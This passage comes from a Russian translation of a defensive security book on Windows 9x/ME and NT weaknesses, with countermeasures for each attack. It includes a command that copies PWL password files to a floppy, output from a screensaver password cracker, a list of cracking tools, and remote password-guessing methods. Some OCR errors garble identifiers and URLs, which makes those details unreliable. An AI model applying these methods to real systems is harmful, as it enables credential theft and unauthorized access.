    В завершение необходимо подчеркнуть, что после установки коммерческого программного обеспечения, предназначенного для удаленного управления системой Win 9x. все предыдущие рекомендации не имеют смысла. Если такие программы не настроены должным образом, то любой мало-мальски грамотный и настойчивый злоумышленник сможет получить полный контроль над вашим компьютером, как если бы он сам сидел за его клавиатурой. О таких программах мы поговорим подробнее в главе 13.


    6. Отказ в обслуживании (DoS)



    Отказ в обслуживании DoS


    Вмешательство в работу, приводящее к отказу системы от обслуживания (Denial of Service) поступающих к ней запросов, — это последнее прибежище для извращенного ума. К сожалению, людей с таким типом мышления в Internet предостаточно. Имеется много программ, обладающих возможностью отправки сетевых пакетов с "патологической" структурой, предназначенных для аварийного завершения работы Win 9x Обычно такие программы имеют названия типа ping of death, teardrop, land, WinNuke и т.п. Подробнее об отказе в обслуживании мы будем говорить в главе 12, а сейчас лишь отметим, что для системы Win 9x существует одно универсальное средство защиты: модуль обновления Dial-Up Networking Update 1.3 (DUN 1.3).

    Контрмеры



    В состав DUN 1.3 входит обновленная библиотека Win 95 Windows Sockets (Winsock), в которой реализованы основные процедуры обработки многих потенциальных проблем TCP/IP, используемых при нападении с целью генерации условия DoS. Пользователям Win 98 не нужно устанавливать это обновление, за исключением, пожалуй, лишь жителей Северной Америки, которые хотят обновить используемые по умолчанию в Windows 98 средства шифрования с 40-битовыми ключами на их более надежную 128-битовую версию. Пакет обновления DUN 1.3 для Win 95 можно найти по адресу http://www.microsoft.com/windows95/downloads/.
    Однако даже после установки пакета DUN 1.3 мы настоятельно рекомендуем не предоставлять компьютеры Win 9x непосредственно в Internet (т.е. минуя внутренний брандмауэр или другое устройство управления доступом).

    Программные брандмауэры



    И в заключение рассмотрения методов удаленного проникновения мы настоятельно рекомендуем приобрести какой-нибудь программный брандмауэр из числа имеющихся на современном рынке программного обеспечения. Эти программы будут выступать буфером между компьютером и сетью, что позволит заблокировать все попытки несанкционированных действий. Нам больше всего нравится пакет BlackICE Defender, который распространяется компанией Network ICE (http://www.networkice.com) по цене $39.95. К другим программным продуктам, популярность которых быстро возрастает, можно отнести ZoneAlarm (бесплатно распространяемый компанией Zone Labs для личного использования, http://www.zonelabs.com/) и бесплатно распространяемый пакет eSafe Desktop компании Aladdin (http://www.ealaddin.com/esafe/desktop/detailed.asp). Для того чтобы избежать головной боли в дальнейшем, приобретите такое средство и обеспечьте его функционирование в наиболее напряженном режиме.


    7. Непосредственное проникновение



    Непосредственное проникновение


    Как нам кажется, в предыдущем разделе мы довольно убедительно показали, что для того, чтобы сделать систему Win 9x доступной для удаленного проникновения, пользователю нужно так или иначе потрудиться. К сожалению, в том случае, когда злоумышленник имеет физический доступ к системе, картина меняется на противоположную: теперь пользователю нужно потрудиться, чтобы сделать систему по-настоящему недоступной. В большинстве случаев, располагая достаточным запасом времени и пользуясь отсутствием должного контроля, а также наличием свободного черного хода, злоумышленники рассматривают физический доступ как возможность простого хищения компьютера. Однако в данном разделе мы не будем рассматривать угрозы, связанные с массовыми хищениями самих компьютеров, а сосредоточимся на некоторых скрытых (а также явных) методах, позволяющих похитить критическую информацию, содержащуюся на компьютере с системой Win 9x

    Обход средств защиты Win 9x:  перезагрузка!



    В отличие от Windows NT в системе Win 9x не используется концепция безопасного многопользовательского доступа к консоли. Таким образом, любому, кто имеет возможность приблизиться к системе с Win 9x на расстояние вытянутой руки, для получения доступа нужно просто включить компьютер либо выполнить "жесткую" перезагрузку (hard reboot), если он заблокирован с помощью экранной заставки (screen saver). Ранние версии Win 95 позволяли обходить заставку даже с помощью комбинаций клавиш <Ctrl+Alt+Del> или <Alt+Tab>! Все приглашения на ввод пароля, которые появляются при начальной загрузке, — не более чем косметические меры. Пароль Windows нужен лишь для активизации того или иного пользовательского профиля и не обеспечивает защиту каких-либо ресурсов (кроме самого списка паролей, о чем говорится ниже в этой главе). Для обхода приглашения на ввод пароля достаточно щелкнуть на кнопке Cancel, после чего продолжится нормальная загрузка системы. После ее завершения доступ к системным ресурсам будет практически полным. То же самое относится и ко всем диалоговым окнам сетевой регистрации (их вид может зависеть от того, к какому типу сети подключена система, но суть от этого не меняется).

    Контрмеры: защита консоли



    Одним из традиционных методов решения этой проблемы является установка пароля, хранящегося в BIOS. BIOS (Basic Input Output System) — это система низкоуровневых процедур, код которых хранится в специальной микросхеме, которая устанавливается на системной плате и обеспечивает начальную инициализацию оборудования совместимых с IBM PC компьютеров и загрузку операционной системы. Таким образом, система BIOS первой получает доступ к ресурсам, поэтому практически все разработчики BIOS предоставляют возможность защиты доступа к компьютеру с помощью пароля, что может остановить не очень искушенного злоумышленника. Профессионалы, конечно, могут просто извлечь из компьютера жесткий диск и подключить его к другому компьютеру без пароля BIOS или же воспользоваться одним из многочисленных средств взлома пароля BIOS, которые можно найти в Internet.
    Конечно, для экранной заставки также нужно обязательно задать пароль. Это можно осуществить в диалоговом окне Display Properties во вкладке Screen Saver. Одна из наиболее досадных особенностей системы Win 9x заключается в том, что в ней отсутствует встроенный механизм ручной активизации экранной заставки. Однажды для этого мы воспользовались одной хитростью. Ключ -s программы загрузки Microsoft Office (osa.exe -s) позволяет активизировать заставку и, таким образом, эффективно блокировать экран при каждом ее запуске. Для удобства мы поместили соответствующий ярлык в меню Start, так что этой командой можно было воспользоваться при первой необходимости. Более подробную информацию можно получить в базе знаний компании Microsoft в статье Q210875 (http://search.support.microsoft.com).
    Кроме того, существует несколько коммерческих пакетов, предназначенных для зашиты Win 9x, которые блокируют доступ к системе или шифруют содержимое жесткого диска. Шифрование файлов с применением открытого ключа выполняет и очень известная в настоящее время, но по-прежнему бесплатная для частных лиц программа PGP (Pretty Good Privacy), которую распространяет компания Network Associates, Inc. (http: //www.nai.com).

    Автозапуск и взлом пароля экранной заставки



    Перезапуск компьютера с помощью кнопки Reset системного блока или с помощью комбинации клавиш <Ctrl+Alt+Del> — это слишком примитивно для взломщика-эстета (или же слишком осторожного системного администратора, забывшего пароль экранной заставки). К удовольствию столь ранимых натур, существует более красивый способ обхода защиты системы Win 9x, в которой установлен пароль экранной заставки. Он базируется на двух недостатках системы безопасности Win 9x — режиме автоматического распознавания компакт-дисков и примитивном алгоритме шифрования пароля в системном реестре.
    Лучше всего проблема автоматического распознавания компакт-дисков описывается в статье Q14I059 базы знаний компании Microsoft.
    "Windows постоянно опрашивает дисковод CD-ROM, чтобы определить момент, когда в него будет помещен компакт-диск. Как только это произойдет, выполняется проверка наличия файла Autorun.ini. Если такой файл существует, то автоматически будут запушены программы, указанные в строке ореn= этого файла."
    Нетрудно догадаться, что такой "сервис" может обернуться несанкционированным запуском любой программы (как вы относитесь к идее автозапуска Back Orifice или NetBus с пиратского компакт-диска?). Однако сейчас для нас важнее другая сторона этой медали — в системе Win 9x программа, указанная в файле Autorun.ini, запускается лаже во время работы экранной заставки.
    Теперь перейдем ко второму недостатку. Общеизвестно, что Win 9x помешает пароль, используемый для отключения экранной заставки, в ключе системного реестра HKEY\Users\.Default\Control Panel\ScreenSave_Data, а механизм преобразования (шифрованием это назвать трудно) пароля уже изучен. Поэтому не составляет никакого труда извлечь это значение из системного реестра (если не используются профили пользователей, то системный реестр хранится в файле С: Windows\ USER.DAT), восстановить его, а затем передать полученный пароль системе через вызов стандартной процедуры. Вуаля — экранная заставка исчезла!
    Такой трюк умеет проделывать программа SSBypass компании Amecisco (http://www.amecisco.com/ssbypass.htm), которая стоит $39.95. Существуют и отдельные программы-взломщики пароля экранной заставки, такие, например, как 95sscr4.  Там же можно познакомиться и со многими другими интересными утилитами. Программа 95sscrk не обходит экранную заставку, а просто извлекает пароль из системного реестра и расшифровывает его.

    С: \TEMP>95sscrk
    Win9b Screen Saver Password Cracker vl.I - Coded by Nobody
    (noboaySengaiska.se)
    (c) Cupyrite 1997 Burnt Toad/AK
    Enterprises - lead 95SSCRK.TXT before usage!
    -----------------------------------------
    • No filena-e in command line,
    using default! (C:\WINDOWS\USER.DAT)
    • Rav, registry file detected, ripping out strings..
    . • Scanning strings for password key...
    Found password data! Decrypting ...
    Password is GUESSME"
    _ Cracking complete!
    Enjoy the passwords!

    Контрмеры: защита экранной заставки Win 9х



    Компания Microsoft разработала модуль обновления, который обеспечивает гораздо более высокий уровень зашиты пароля экранной заставки, под названием Windows NT/2000. Однако для упрямых приверженцев Win9x, которые могут согласиться лишь на отключение режима автоматического распознавания компакт-дисков, приведем выдержку из статьи Q126025 базы знаний Microsoft Knowledge Base.
    1. В панели управления щелкните дважды на пиктограмме System.
    2. Перейдите во вкладку Device Manager открывшегося диалогового окна.
    3. Щелкните дважды на элементе, соответствующем устройствам чтения компакт-дисков, а затем — на элементе списка, соответствующем вашему устройству.
    4. В открывшемся диалоговом окне перейдите во вкладку Settings и сбросьте флажок Auto Insert Notification.
    5. Щелкайте на кнопках ОК или Close до тех пор, пока не закроются все открытые окна и вы не вернетесь в окно панели управления. Когда появится сообщение с предложением перезагрузить компьютер, щелкните на кнопке Yes.

    Обнаружение паролей Win 9x  в памяти



    Если после обхода экранной заставки у злоумышленника еще остался некоторый запас времени, он может воспользоваться средствами обнаружения и получить другие системные пароли, которые в соответствующих строках диалоговых окон представляются символами "*". Такие средства скорее можно отнести к утилитам, которые могут помочь забывчивым пользователям, чем к инструментам взломщика, однако они настолько хороши, что нельзя их не упомянуть и в данной книге.
    Одной из самых популярных утилит обнаружения паролей является Revelation, созданная компанией SnadBoy Software (http://www.snadboy.com), работа которой показана на рис. 4.7.
    Еще одной подобной утилитой является ShoWin Робина Кейра (Robin Keir). Среди других утилит такого же класса можно отметить Unhide, написанную Витасом Раманчаускасом. Там же можно получить и утилиту pwltool, о которой МЫ поговорим в следующем разделе. Во многих архивах Internet можно отыскать программу Dial-Up Ripper (dripper) Корхана Кая (Korhan Kaya), которая позволяет получить пароли удаленных соединений, если в их свойствах был установлен режим их сохранения. Еще раз напомним, что для использования данных утилит необходимо иметь физический доступ к компьютеру, на котором легальный пользователь начал сеанс работы. (Строго говоря, если злоумышленник имеет такую возможность, то зачем ему пароли, — ведь в его распоряжении весь компьютер?) Однако такие программные средства все же могут представлять собой угрозу в том случае, если кто-либо имеет возможность беспрепятственного доступа к разным компьютерам организации и располагает обычной дискетой с такими программами, как Revelation. Просто представьте на минуту. что все пароли организации могут попасть, например, в руки студента, приглашенного для администрирования сети на время летних отпусков! Да, кстати. Система Windows NT также не может противостоять таким средствам. Упомянутые выше утилиты окажутся бессильными лишь в одном случае: если в диалоговых окнах не сохраняются пароли (проще говоря, если после открытия окна в соответствующей строке вы не видите звездочек, то можно спать спокойно).



    Рис. 4.7. Утилита Revelation 1.1 компании SnadBoy Software позволяет увидеть "скрытый " пароль, используемый для доступа к совместно используемым ресурсам Windows

    Взлом файлов . PWL



    Злоумышленнику вовсе не обязательно получить доступ к компьютеру на несколько часов —- он может за пару минут переписать нужные ему файлы на дискету, а затем расшифровать их в свободное время, как это обычно и делается при использовании "классических" утилит взлома паролей, таких как crack для UNIX или LOphtcrack для Windows NT.
    Зашифрованные файлы паролей Win 9x (с расширением PWL), находятся в корневом каталоге Windows (обычно С: \windows). Эти файлы именуются аналогично пользовательским профилям системы. Поэтому достаточно воспользоваться простым командным файлом, чтобы скопировать на дискету все найденные файлы паролей, сору С:\Windows\*.pwl a:
    По сути дела. PWL-файл представляет собой кэшированный список паролей, используемых для получения доступа к следующим сетевым ресурсам.

    •  Совместно используемые ресурсы, защищенные с помощью пароля.
    •  Приложения, использующие программный интерфейс (API — Application Programming Interface) для доступа к кэшированным паролям (например, Dial-Up Networking).
    •  Компьютеры Windows NT, не входящие в домен.
    • Пароли для входа в сеть Windows NT, которые не являются основными паролями входа в сеть. 
    •  Серверы NetWare.

    До появления версии OSR2 в системе Windows 95 применялся очень простой алгоритм шифрования PWL-файлов, который можно было взломать с помощью широко распространенных средств без особых усилий. OSR2 (OEM System Release 2) — это промежуточная версия Windows 95, которая не продавалась в розничной сети, а устанавливалась производителями аппаратных средств (OEM — Original Equipment Manufacturer). В настоящее время при шифровании РWL-файлов используется более надежный алгоритм, однако он по-прежнему основывается лишь на данных учетной записи пользователя Windows. Это означает, что время, необходимое на подбор пароля, возросло, но сама задача взлома пароля осталась по-прежнему вполне выполнимой.
    Одним из средств для взлома PWL-файлов является утилита pwltool, написанная уже упоминавшимся Витасом Раманчаускасом и Евгением Королевым. Эта утилита (рис. 4.8) может применяться для взлома заданного PWL-файла как с помощью словаря, так и путем обычного перебора всех возможных вариантов. Таким образом, успех взлома зависит всего лишь от размера словаря (pwltool требует, чтобы все слова в списке состояли из прописных символов) и вычислительной мощности компьютера. Хотим еще раз подчеркнуть, что pwltool скорее нужно расценивать как полезную утилиту для забывчивых пользователей, а не как инструмент хакинга. На наш взгляд, время можно провести гораздо полезнее, чем тратить его на взлом PWL-файла. С другой стороны, если судить формально, то такие утилиты все же представляют собой достаточно серьезную опасность.



    Рис. 4.8. Утилита pwltool позволяет получить пароли, хранящиеся в pWL-фашшх.

    Еще одним хорошим средством для взлома РWL-файлов является CAIN от Break-Dance (http://www.confine.com). Эта утилита позволяет также получить из системного реестра пароль экранной заставки, выполнить инвентаризацию локальных совместно используемых ресурсов, кэшированных паролей и другой системной информации.

    Контрмеры: защита PWL-файлов



    Для тех администраторов, которых действительно беспокоит данная проблема. можно посоветовать воспользоваться редактором системной политики Win 9x и запретить кэширование паролей. Эту задачу можно решить и другим способом, создав (при необходимости) и установив следующий параметр системного реестра.
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Policies\ Network\DisablePwdCaching = 1
    Если вы до сих пор пользуетесь одной из ранних версий Win 95 (выпушенных до появления OSR2), то из Internet можно получить и установить модуль обновления. обеспечивающий более надежное шифрование РWL-файла. Для этого необходимо выполнить инструкции, приведенные в статье базы знаний компании Microsoft по адресу http://support.microsoft.com/support/kb/articles/Ql32/8/07.asp.


    PWL-файлы -- это далеко не единственная жертва программистов-взломщиков. Например, на Web-узле, расположенном по адресу http: //www. lostpasswcrc..com. содержится перечень утилит, предназначенных для взлома практически любых паролей, начиная от FST-файлов Microsoft Outlook и заканчивая файлами Microsoft Word. Excel и PowerPoint (так и хочется спросить: "Что вы хотите взломать сегодня?"). Имеется также несколько программ для взлома ZIP-файлов, в которых многие пользователи пересылают важную информацию, надеясь на защиту таких архивов с помощью пароля. Например, утилита Advanced Zip Password Recovery (AZPR) компании Elcomsoft позволяет выполнить взлом с помошью словаря или посредством перебора всех возможных вариантов. Кроме того, она является чрезвычайно быстрой Т >к, и >. приведенного ниже рисунка видно, что в процессе одного сеанса работы за одну секунду в среднем осуществлялась проверка.518783 паролей.
    Еще одним хорошим узлом с богатым выбором утилит тестирования и восстановления паролей является Web-страница Джо Песцеля. Приятно знать, что как бы вы ш запутались в паролях, вам всегда поможет сосед-хакер, не так ли?


    7.gif

    Изображение: 

    8.gif

    Изображение: 

    9.gif

    Изображение: 

    8. Windows Millenium Edition (ME)



    Windows Millenium Edition (ME)


    Компания" Microsoft выпустила свою новую операционную систему Windows Millenium Edition (ME). Она является прямой наследницей Win 9.x и с этой точки зрения не содержит никаких серьезных изменений в области обеспечения безопасности по сравнению с более ранними версиями. Другими словами, если вы всерьез обеспокоены вопросами обеспечения безопасности, то лучше перейти к другой версии — Windows 2000. Win ME продолжает традиции своих предшественниц и предоставляет минимальные возможности защиты, чтобы повысить совместимость оборудования и простоту использования системы. С точки зрения обеспечения безопасности эта операционная система очень похожа на Win 9.x. Следовательно, нет никаких причин подробно рассматривать Win ME.
    Для удаленною проникновения Win ME по-прежнему не представляет никакого интереса. В этой операционной системе не появилось ни одной новой службы. По умолчанию режим совместного использования файлов и принтеров отключен, как и служба удаленного управления системным реестром. Если конечный пользователь не изменит режимы, установленные по умолчанию, то удаленное проникновение в систему Win ME окажется практически невозможным.
    В Win ME имеется усовершенствованный компонент, позволяющий совместно не пользовать подключение к Internet (ICS — Internet Connection Sharing). Аналогичное средство появилось еще в системе Win 98, однако теперь его гораздо проще установить и настроить с помощью многочисленных мастеров. Благодаря компоненту ICS компьютер под управлением системы Win ME может функционировать в качестве маршрутизатора, когда несколько компьютеров совместно используют единственное подключение к Internet. Такой режим в Win 9x отсутствовал, так что в Win ME он открывает для взломщиков интересные возможности.
    Компонент ICS устанавливается с помощью аплета Add/Remove Programs панели управления, во вкладке Windows Setup открывшегося диалогового окна. Настроить новую службу можно с помощью мастера Home Networking Wizard, который позволяет установить режим, когда ресурсы компьютера требуется предоставить в совместное пользование. В процессе установки имеется возможность ввести пароль, однако делать это необязательно. После перезагрузки будет установлен режим совместного использования файлов и принтеров. Если пароль не был задан, то папка My Documents или My Shared Documents (C:\A11 Users\Documents, имя ресурса Documents) будет доступна для совместного использования без ограничений и без пароля. Однако совместно используемые ресурсы будут доступны лишь с "внутренней" стороны сети.
    Хотя служба ICS не должна повышать уязвимость интерфейса с внешним миром, она разрабатывалась для маршрутизации трафика исходящих сообщений из внутренней во внешнюю сеть (даже посредством удаленных соединений). По-видимому, взломщик, проникнувший в систему Win ME или подключившийся к удаленной сети через службу ICS, получит практически неограниченный доступ к компьютерам этой сети. Нет смысла предполагать, что удаленные клиенты Windows не повлияют на безопасность сетей, к которым они подключены.
    В терминах локального проникновения система Win ME аналогична 9х. Стоит еще раз подчеркнуть: устанавливайте пароли BIOS на общедоступных компьютерах (особенно переносных), задайте пароль экранной заставки, а также подсистемы управления питанием. В справочной системе Win ME содержится информация о новой возможности шифрования папок, однако в используемой нами версии этой системы после щелчка правой кнопкой на имени папки она остается недоступной. Нам не удалось собрать никакой дополнительной информации о поддерживаемых алгоритмах и местах хранения ключей шифрования.


    9. Резюме



    Резюме


    Время идет вперед, и Win 9х становится все менее и менее интересной в качестве потенциальной жертвы. Взломщиков все больше интересуют более новые операционные системы, такие как Windows 2000. Для тех, кто остался приверженцем Win 9x, следует принять во внимание следующее.

    •  С точки зрения сетевого взломщика, система Windows 9x/ME несколько инертна, поскольку в ней отсутствует встроенная поддержка регистрации в сети. Практически единственной угрозой сетевой целостности Win 9х/МЕ является совместное использование файлов, что можно легко исправить путем выбора хорошего пароля, и опасности возникновения условия DoS, что так же в большинстве случаев легко решается путем установки пакета обновления DUN 1.3 и системы Windows ME. Однако в любом случае мы настоятельно рекомендуем не подключать незащищенные системы Win 9x/ME непосредственно к Internet. Простота, с которой такие компьютеры могут оказаться в руках взломщиков, и недостаток адекватных средств защиты — верные источники возникновения проблем.
    •  Гуляющие по просторам Internet Back Orifice и NetBus, а также многочисленные коммерческие пакеты, предназначенные для удаленного управления (см. главу 13), могут сделать гораздо больше, чем простое расширение недостающей Win 9х/MЕ сетевой функциональности. Убедитесь, что они не установлены на компьютере без вашего ведома (например, через известные изъяны клиентского программного обеспечения Internet, как будет описано в главе 16), а также в том, что легально установленные программы настроены на максимальный уровень безопасности (т.е. используются хорошие пароли).
    •  Постоянно обновляйте программное обеспечение, поскольку в пакетах обновления зачастую содержатся исправления различных модулей системы защиты. Для получения более подробной информации о степени уязвимости необновленного программного обеспечения, а также о способах повышения их надежности читайте главу 16.
    •  Если кто-то получит физический доступ к вашему компьютеру под управлением Win 9x, вам конец (впрочем, то же самое можно сказать и о большинстве других операционных систем). Единственным решением этой проблемы может быть защита с помощью пароля BIOS, а также использование программного обеспечения сторонних производителей.
    •  Если вы занимаетесь хакингом Win Эх из любопытства, вам будет чем поразвлечься, особенно, если вспомнить о количестве рассмотренных утилит. Если же вы администратор сети, то не забывайте, что в PWL-файлах могут содержаться данные пользовательских учетных записей, используемых для регистрации в сети. Поэтому не нужно относиться к утилитам такого рода пренебрежительно, особенно, если физический доступ к компьютерам пользователей с системой Win Эх в вашей организации слабо ограничен или совсем не контролируется.


    Глава 5. Уязвимость Windows NT



    Глава 5. УЯЗВИМОСТЬ WINDOWS NT




    1. Уязвимость Windows NT



    Уязвимость WINDOWS NT


    Согласно маркетинговым данным, операционная система компании Microsoft Windows NT занимает значительную долю рынка сетевых операционных систем как в государственном, так и в частном секторе экономики. При этом Windows NT стала "мальчиком для битья" в хакерской среде. Что послужило причиной, то ли ее широкая распространенность, то ли раздражение от маркетинговой политики Microsoft, то ли стойкая нелюбовь в профессиональной среде к ее простому в использовании графическому интерфейсу, который воспринимается как профанация самого понятия сетевой операционной системы, сказать трудно, однако факт остается фактом. Впервые о проблемах безопасности в NT заговорили в начале 1997 года после опубликования хакером Хоббитом (Hobbit) из группы Avian Research статьи о двух фундаментальных архитектурных решениях Windows NT — Common Internet File System (CIFS) и Server Message Block (SMB). (Co статьей можно ознакомиться по адресу http://www.insecure.org/stf/cifs.txt.) С тех пор работа над выискиванием методов проникновения в систему NT не прекращается ни на один день.
    Компания Microsoft терпеливо устраняет все недостатки по мере их обнаружения. Поэтому на сегодняшний день мы считаем, что расхожее мнение о том, что Windows NT является абсолютно незащищенной системой, справедливо не более, чем на 1%. При грамотном подходе NT обеспечивает безопасность не ниже, чем любая система UNIX. Более того, мы возьмем на себя смелость заявить, что по некоторым причинам система защиты NT может превосходить средства безопасности UNIX, в пользу чего говорят следующие доводы.

    •  NT не предоставляет встроенных средств, обеспечивающих удаленный запуск кода в процессорном пространстве сервера. Любые выполняемые программы, запускаемые клиентом, загружаются в память клиентского ПК и выполняются его процессором. Исключением из этого правила является терминальный вариант системы NT Terminal Server Edition, обеспечивающий многопользовательский графический интерфейс для удаленных клиентов (данная возможность встроена в следующую версию NT —Windows 2000, см. главу 6).
    •  Право интерактивной регистрации в сети с консоли NT Server (на рабочие станции это ограничение не распространяется) по умолчанию предоставляется лишь нескольким пользователям, обладающим правами администратора. Так что, если злоумышленнику не удастся раздобыть пароль администратора, он ничего не сможет сделать даже имея физический доступ к консоли сервера. Существуют некоторые методы, позволяющие обойти эти препятствия, однако они требуют совпадения чрезвычайно маловероятных событий.

    Итак, если все это правда, тогда почему мы не утверждаем, что NT безопасна на все 100%? На то есть две причины: поддержка старых программ (так называемая совместимость сверху вниз) и простота использования. Как мы покажем ниже в этой главе, приверженность к старым клиентским программам может сделать NT менее безопасной, чем она могла бы быть. Два основных примера — это обеспечиваемая в NT поддержка сетевых протоколов NetBIOS, CIFS и SMB, а также старый алгоритм шифрования пользовательских паролей, доставшийся NT в наследство от Lan Manager. Именно благодаря этим нюансам задача хакера по инвентаризации системной информации NT и расшифровке файлов с паролями является более легкой, чем она могла бы быть.
    Во-вторых, простота интерфейса NT очень привлекает начинающих администраторов, которые, как правило, мало задумываются о таких вещах, как обеспечение безопасности. Судя по нашему опыту, строгие правила выбора паролей и хорошая настройка параметров безопасности — довольно редкое явление даже в среде опытных системных администраторов. Таким образом, у взломщика, натолкнувшегося на сеть NT, всегда есть шанс обнаружить по крайней мере на одном компьютере, будь то сервер или рабочая станция, учетную запись Administrator с пустым паролем. Кроме того, простота установки системы NT "на скорую руку" еще больше усиливает данную проблему.
    Итак, взглянув на вопросы безопасности NT "с птичьего полета", давайте опустимся на землю и приступим к рассмотрению деталей.


    2. Введение



    Введение


    При изложении материала данной главы мы будем считать, что большая часть подготовительной работы для проникновения в систему NT уже проделана: цель выбрана (глава 2), а ее ресурсы инвентаризованы (глава 3). Как уже упоминалось в главе 2, если при сканировании оказалось, что порты 135 и 139 находятся в состоянии ожидания запросов, значит, данный узел, по-видимому, работает под управлением системы Windows NT (если обнаружен только порт 139, то это может быть и Windows 9x). Более полная информация о системе Windows NT может быть получена при сборе идентификационных маркеров.

    Как вы увидите в главе 6, наличие открытого порта 445 также является признаком системы Win 2000.

    После того как выбранная цель однозначно идентифицирована как компьютер под управлением Windows NT, начинается процесс инвентаризации ее ресурсов. В главе 3 подробно описаны средства, использующие анонимные соединения, посредством которых можно извлечь информацию о пользователях, группах и службах, работающих на целевом компьютере. При инвентаризации обычно выявляется столько информации, что зачастую бывает трудно провести грань между тем, где заканчивается инвентаризация и где начинается проникновение. Как правило, попытки взлома пароля следуют сразу же за выявленным именем пользовательской учетной записи. Анализируя данные, полученные с помощью методов инвентаризации, о которых мы говорили в главе 3, взломщик обычно всегда находит какие-то "зацепки" для выбора точки проникновения.


    3. На каком свете мы находимся



    На каком свете мы находимся


    Следуя классической модели проникновения, на которой построена эта книга, мы посвятили данную главу описанию оставшихся действий типичного хакера, пытающегося проникнуть в систему Windows NT: получение привилегий суперпользователя, расширение полномочий и сокрытие следов проникновения.
    Эта глава не содержит полного и всеобъемлющего описания всех имеющихся в Internet средств, с помощью которых можно выполнить перечисленные выше задачи. Мы расскажем лишь о наиболее элегантных и полезных (на наш взгляд) из них, уделяя основное внимание общим принципам и методологии проникновения. Имеется ли самый правильный путь, следуя которым систему NT можно наилучшим образом подготовить к потенциальному проникновению?

    Пожалуй, наиболее опасными методологиями проникновения в систему Windows, не рассмотренными в данной главе, являются приемы хакинга в Web. Средства защиты на уровне операционной системы зачастую оказываются бесполезными при предотвращении подобных атак на уровне приложений. Некоторые из наиболее разрушительных атак на систему NT за последние несколько лет базировались на использовании таких средств, как компонентов MDAC, и были направлены против встроенного в NT/2000 Web-сервера — Internet Information Server (US). Эти средства проникновения рассматриваются в главе 15.


    4. Windows 2000



    Windows 2000


    Система NT находится не на самом верху иерархии операционных систем компании Microsoft. Выпушенная в начале 2000 года, система Windows 2000 является самой последней и мощной версией NT.
    Win 2000 будет обсуждаться в своем собственном пространстве терминов в главе 6. Хотя некоторые читатели могут не согласиться с логическим разделением двух тесно связанных друг с другом операционных систем, мы считаем, что различия между ними достаточно существенны и заслуживают отдельного рассмотрения.
    Естественно, многие (ели не все) приемы, описанные в данной главе, применимы также и к системе Win 2000, особенно если их использовать на практике. Мы сделали все возможное, чтобы привести такие ситуации, в которых поведение этих операционных систем различается или Win 2000 обеспечивает лучшее решение проблемы. Подобные различия приводятся в разделах, посвященных возможным контрмерам. Однако в то же время мы не преследовали цель представить эти сведения как полное руководство по переходу с одной системы на другую или их сравнительный анализ. Конечно, переход на новую операционную систему не должен происходить спонтанно и мы надеемся, что приемы проникновения, имеющие отношение к NT (и к Windows 2000 при ее работе в смешанном режиме, используемом по умолчанию) окажутся полезными на практике в течение многих лет.
    Во время написания этой книги система Win 2000 только появилась на рынке программного обеспечения и с точки зрения обеспечения безопасности уже выдержала несколько серьезных тестов. В общем, мы считаем эту операционную систему более устойчивой против нападений взломщиков и настоятельно рекомендуем обновить используемую систему до Win 2000, поскольку она обеспечивает более надежную систему защиты. Для Win 2000 уже имеются пакеты обновления, удовлетворяющие современным требованиям и протоколам, которые предоставляют гораздо более высокую степень защиты. Кроме того, упростился доступ к некоторым скрытым параметрам системы безопасности NT, которые теперь помещены в системный реестр. Од н.-.-к о систему Win 2000 не следует рассматривать как панацею от всех бед. Не стоит сидеть сложа руки и ждать, что система Win 2000 будет сама обеспечивать требуемую защиту. Рассчитывать нужно в первую очередь на себя, и это касается любой операционной системы. Время покажет, насколько Win 2000 является исключением из этого правила, и глава 6 может служить подтверждением этого факта.


    5. Administrator: в поисках сокровищ



    Administrator: в поисках сокровищ



    Правило № 1, о котором нельзя никогда забывать при обеспечении безопасности Windows NT, состоит в том, что любой нарушитель абсолютно беспомощен, если он не обладает нравами администратора. Как мы увидим из дальнейшего обсуждения. NT не поддерживает (по умолчанию) удаленного выполнения команд, а если и позволяет это делать, то интерактивно зарегистрироваться могут лишь пользователи из группы администраторов. Это существенно сужает возможности удаленных пользователей по нанесению ущерба. Поэтому взломщики, как голодные акулы, рыщущие в океанской пучине в поисках жертвы, прилагают все усилия, чтобы выявить учетные записи пользователей, обладающих правами администратора. Именно поэтому мы начнем с рассмотрения деталей основного механизма получения привилегий администратора — подбора пароля.
    Что, несколько неожиданно? Вы думали, что мы вам расскажем о каком-то чудесном способе, с помощью которого вы моментально поставите NT "на колени"? Хотя существование такой "серебряной пули" теоретически возможно, ее все еще никто не нашел за все гады существования операционной системы NT. Некоторые из возможных подходов будут рассмотрены в конце раздела. Однако, к сожалению, вынуждены вас огорчить — в том, что касается безопасности, справедливо древнее утверждение: "Чем больше веши меняются, тем больше они остаются неизменными". Другими словами, прежде, чем защищаться от каких-либо экзотических методов проникновения, необходимо с помощью правильно выбранного пароля как можно лучше защитить учетную запись Administrator.

    Удаленный подбор пароля



    Если на удаленном компьютере запушена служба NetBIOS, с которой связан TCP-порт 139, то самым эффективным методом проникновения в систему NT является удаленное подключение к выявленному ранее совместно используемому ресурсу и подбор пар регистрационное имя/пароль до тех пор, пока одна из них не окажется правильной.
    Конечно, для того чтобы процесс подбора пароля оказался по-настоящему эффективным, необходимо наличие списка пользовательских имен. Ранее уже были рассмотрены некоторые из лучших методов поиска учетных записей пользователей, включая анонимное подключение с помощью команды net use, которая устанавливает нулевое соединение с исследуемым узлом. Для этих же целей можно воспользоваться также утилитой DumpACL/DumpSec от компании Somarsoft Inc., а также утилитами sid2u=er/usar2sid Евгения Рудного (Evgenii Rudnyi). Все эти средства обсуждались в главе 3. Обнаружив реально существующие учетные записи, можно существенно повысить вероятность успешного подбора пароля.
    Найти совместно используемый ресурс, который подходит для нападения, обычно не составляет никакого труда. Из главы 3 вы узнали, что в системах, в которых TCP-порт 139 доступен для удаленного доступа, всегда присутствует скрытый совместно используемый ресурс IFCS, необходимый для взаимодействия процессов. Кроме того, в процессе подбора пароля практически всегда можно воспользоваться административными ресурсами ADMIN$ и [%раздел-диска%]$ (например, С$). Естественно, можно также провести инвентаризацию совместно используемых ресурсов, как описывалось в главе 3.
    Имея под рукой все необходимые данные, нарушитель, находящийся в сети предприятия, может просто открыть окно Network Neighborhood (если с целевым компьютером NT имеется физическое соединение) или же воспользоваться средством поиска Find Computer и IP-адресом для поиска компьютера, находящегося во внешней сети, а потом щелкнуть дважды на пиктограмме найденного компьютера, как показано на приведенных ниже иллюстрациях.


